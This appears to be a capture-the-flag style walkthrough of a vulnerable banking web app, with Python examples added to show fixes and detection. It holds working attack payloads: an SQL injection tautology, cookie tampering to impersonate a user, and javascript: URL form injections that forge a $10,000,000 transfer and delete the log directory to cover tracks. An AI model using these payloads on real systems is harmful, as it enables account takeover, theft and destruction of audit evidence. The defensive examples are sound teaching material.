Cookie Injection, JavaScript Injection & SQL Injection Method


From the navigation and the source code of the pages, we gather the following information (description, page, and form fields):

Register pages: Register.php > register2.php
  • <input type="text" name="username" maxlength=10>
  • <input type="password" name="password" maxlength=50>
  • <textarea name="desc" rows=5 cols=20 maxlength=255>

Login pages: login1.php > login2.php
  • <input type="text" name="username" value="Enter Username">
  • <input type="password" name="Password" value="">

Purge files: cleardir.php
  • <input type='hidden' name='dir' value='loginSQLFiles'>

Transfer money from one account to another: movemoney.php
  • <input type='text' name='TO' value='Username To Give Money To'>
  • <input type='text' name='AMOUNT' value='Amount Of Money To Move'>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Gary Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First, create your own account and log in. Once that is done, type the following command in the URL bar: javascript:alert(document.cookie); it displays our cookie values in clear text, which indicates that the site is vulnerable. Then open the user info page and enter the following SQL injection to list all users: ' or 'a'='a

By scrolling down, we find:

GaryWilliamHunter : — $$$$$ —

The two values are separated by a colon:

  • Before the colon: the login (GaryWilliamHunter)
  • After the colon: the description (— $$$$$ —)
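The user-info lookup above accepts ' or 'a'='a because the site evidently splices the submitted name straight into its SQL text. The following Python example is added here to show that defect beside its fix; it is not code from the challenge site (which is PHP), and the users table, its rows, and the description text are constructed for the demonstration.

```python
import sqlite3

# Constructed sample user table, modelled loosely on what the user-info page
# returns (login : description). The challenge site's real schema is unknown.
SAMPLE_USERS = [
    ("alice", "test account"),
    ("GaryWilliamHunter", "-- $$$$$ --"),
    ("bob", "nothing here"),
]

# The tautology payload from the walkthrough.
PAYLOAD = "' or 'a'='a"


def make_db():
    """In-memory SQLite database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, description TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def rendered_query(username):
    """The SQL text that string concatenation produces for a given input."""
    return ("SELECT username, description FROM users WHERE username = '"
            + username + "'")


def lookup_vulnerable(conn, username):
    """Builds the query by concatenation, as the challenge site appears to do.

    The quote in the payload closes the string literal, so the WHERE clause
    becomes  username = '' or 'a'='a  and every row matches.
    """
    return conn.execute(rendered_query(username)).fetchall()


def lookup_parameterized(conn, username):
    """Binds the input as a parameter: it is compared as data, never parsed as SQL."""
    sql = "SELECT username, description FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(rendered_query(PAYLOAD))
    print("vulnerable:    ", lookup_vulnerable(db, PAYLOAD))    # all three rows
    print("parameterized: ", lookup_parameterized(db, PAYLOAD)) # []
```

The parameterized version returns nothing for the payload because no user is literally named ' or 'a'='a; the same input is a legitimate lookup for an exact login. Logging rendered_query output for rejected requests also gives a defender a clear detection signal for this class of probe.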

Objective 2: Move the $10,000,000 into the account dropCash

Entering the same JavaScript command as in Objective 1 in the URL bar displays the cookie information in clear text, which shows that the site is vulnerable to cookie injection.

Install Firebug and Firecookie for Firefox. Then change the value of the cookie named "accountUsername" to "GaryWilliamHunter" and use the following JS injection (copy/paste into the URL bar):

javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))

It dynamically writes a form onto the page containing the values needed for a transfer:

  • FORM ACTION: movemoney.php, as specified in the exercise
  • FROM: value taken from the modified cookie (GaryWilliamHunter)
  • TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
  • AMOUNT: value specified in the exercise. We know this field from the information we gathered.

Submitting the form completes the stage.
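The transfer succeeds because movemoney.php identifies the account to debit from the accountUsername cookie, which the browser's owner can edit at will, and the cookie even carries the password in clear text. The Python example below is added to contrast that scheme with a session cookie whose username is bound to a server-side HMAC, so an edit like the one above no longer resolves to a sender. It is not the challenge site's code; the secret key, the balances, and the move_money routine are constructed for the demonstration.

```python
import hmac
import hashlib

# Hypothetical server-side secret (constructed for this example; a real
# deployment loads it from configuration and rotates it).
SERVER_KEY = b"constructed-demo-key-not-for-real-use"


def issue_session_cookie(username, key=SERVER_KEY):
    """Server side: bind the username to an HMAC so the client cannot edit it.

    Only an identifier is stored; the password never goes into a cookie.
    """
    mac = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return username + "." + mac


def sender_from_plain_cookie(cookies):
    """What the challenge site does: whoever accountUsername names gets debited."""
    return cookies.get("accountUsername")


def sender_from_signed_cookie(cookies, key=SERVER_KEY):
    """Hardened: recompute the HMAC over the username; any edit breaks it."""
    token = cookies.get("session")
    if not token or "." not in token:
        return None
    username, _, mac = token.rpartition(".")
    expected = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return username


def move_money(cookies, to, amount, balances, resolve_sender):
    """movemoney.php-style transfer; resolve_sender decides who is debited.

    Returns True when the transfer went through, False when it was refused.
    """
    sender = resolve_sender(cookies)
    if sender is None or sender not in balances:
        return False
    if amount <= 0 or balances[sender] < amount:
        return False
    balances[sender] -= amount
    balances[to] = balances.get(to, 0) + amount
    return True


def demo():
    """Replays the walkthrough's transfer against both cookie schemes."""
    balances = {"attacker": 5, "GaryWilliamHunter": 10_000_000}

    # Plain cookie, edited in the browser exactly as the walkthrough describes.
    plain_ok = move_money({"accountUsername": "GaryWilliamHunter"}, "dropCash",
                          10_000_000, dict(balances), sender_from_plain_cookie)

    # Signed cookie issued to the attacker, then edited the same way:
    # the MAC still covers "attacker", so verification fails.
    genuine = issue_session_cookie("attacker")
    mac = genuine.rpartition(".")[2]
    tampered = {"session": "GaryWilliamHunter." + mac}
    signed_ok = move_money(tampered, "dropCash", 10_000_000, dict(balances),
                           sender_from_signed_cookie)
    return plain_ok, signed_ok  # (True, False)


if __name__ == "__main__":
    print(demo())
```

The same design (an opaque or signed identifier in the cookie, everything else looked up server-side) also removes the reason the javascript:alert(document.cookie) check was interesting in the first place: even when the cookie is displayed, it contains nothing worth reusing.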

Objective 3: Clear the logs; they're held in the folder 'logFiles'

Copy/paste following code in the URL:

javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))

PS: You can also use the Firefox add-on "Tamper Data" or Google Chrome's "Inspect Element" option instead of Firecookie and Firebug.
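Objective 3 works because cleardir.php purges whatever directory the hidden dir field names, and the field is under the client's control. The Python example below is added to show the server-side gate such an endpoint needs (an allowlist built from the one value the page's own form carried, loginSQLFiles, plus a role check and a name check) and a small detector over application log lines that flags any purge request outside that allowlist. It is not the challenge site's code; the roles, the log format, and the log lines are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs

# Constructed allowlist. The challenge's cleardir.php form carried
# dir=loginSQLFiles, so that is the one directory the purge action is meant
# to empty; the audit log directory logFiles is deliberately not on it.
PURGEABLE_DIRS = {"loginSQLFiles"}
PURGE_ROLES = {"admin"}                    # hypothetical role model
SAFE_DIR_NAME = re.compile(r"^[A-Za-z0-9_]+$")


def validate_purge_request(form, role):
    """Server-side gate for a cleardir.php-style endpoint.

    Returns (allowed, reason). Every decision is made on the server, because
    the hidden form field is attacker-controlled, as the walkthrough shows.
    """
    if role not in PURGE_ROLES:
        return False, "caller is not allowed to purge anything"
    name = form.get("dir", "")
    if not SAFE_DIR_NAME.match(name):
        return False, "directory name contains disallowed characters"
    if name not in PURGEABLE_DIRS:
        return False, "directory is not on the purge allowlist"
    return True, "ok"


# Constructed application log lines (format invented for this example):
#   timestamp user endpoint form-encoded-body
SAMPLE_APP_LOG = """\
2009-05-01T10:00:01 admin cleardir.php dir=loginSQLFiles
2009-05-01T10:05:12 attacker movemoney.php TO=dropCash&AMOUNT=10000000
2009-05-01T10:05:40 attacker cleardir.php dir=logFiles
2009-05-01T10:06:03 attacker cleardir.php dir=log%20Files
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")


def find_suspicious_purges(log_text):
    """Return (timestamp, user, dir) for each cleardir.php call outside the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, user, endpoint, body = m.groups()
        if endpoint != "cleardir.php":
            continue
        target = parse_qs(body).get("dir", [""])[0]
        if target not in PURGEABLE_DIRS:
            hits.append((ts, user, target))
    return hits


if __name__ == "__main__":
    print(validate_purge_request({"dir": "logFiles"}, "admin"))
    for hit in find_suspicious_purges(SAMPLE_APP_LOG):
        print("suspicious purge:", hit)
```

Because the point of the objective is to erase the audit trail, the detector is only useful if its input cannot be deleted by the same endpoint: ship the application log to a separate append-only store (syslog forwarding, a write-once bucket) rather than keeping it in a directory the web application can purge.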

About the Author

Aloha, I'm Amit Ghosh, a web entrepreneur and avid blogger. Bitten by the entrepreneurial bug, I got kicked out of college and ended up being a millionaire and running a digital media company named Aeron7, headquartered in Lithuania.
